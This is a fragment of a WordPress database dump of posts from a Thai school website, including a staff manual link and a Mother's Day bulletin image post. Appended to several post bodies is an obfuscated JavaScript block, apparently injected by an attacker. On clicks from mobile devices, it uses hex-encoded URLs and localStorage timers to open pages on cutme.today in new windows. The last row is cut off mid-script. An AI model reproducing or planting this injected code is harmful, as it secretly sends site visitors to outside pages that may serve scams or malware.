href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf\">คู่มือปฏิบัติงานบุคลกรทางการศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-8d6cec4a-7f4d-4d5b-9005-db09908504c3\">Download</a></div>\n<!-- /wp:file --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่','','inherit','closed','closed','','784-revision-v1','','','2024-08-09 11:59:07','2024-08-09 04:59:07','',784,'http://pakhaeng.ssk.in.th/?p=788',0,'revision','',0),
(789,1,'2024-08-09 21:55:44','2024-08-09 14:55:44','<!-- wp:image {\"id\":790,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/29-67-724x1024.png\" alt=\"\" class=\"wp-image-790\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ วันแม่แห่งชาติ','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%a7%e0%b8%b1%e0%b8%99','','','2024-08-09 21:55:44','2024-08-09 14:55:44','',0,'http://pakhaeng.ssk.in.th/?p=789',0,'post','',0),
(790,1,'2024-08-09 21:55:10','2024-08-09 14:55:10','','29-67','','inherit','','closed','','29-67','','','2024-08-09 21:55:10','2024-08-09 14:55:10','',789,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/29-67.png',0,'attachment','image/png',0),
(791,1,'2024-08-09 21:55:44','2024-08-09 14:55:44','<!-- wp:image {\"id\":790,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/29-67-724x1024.png\" alt=\"\" class=\"wp-image-790\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 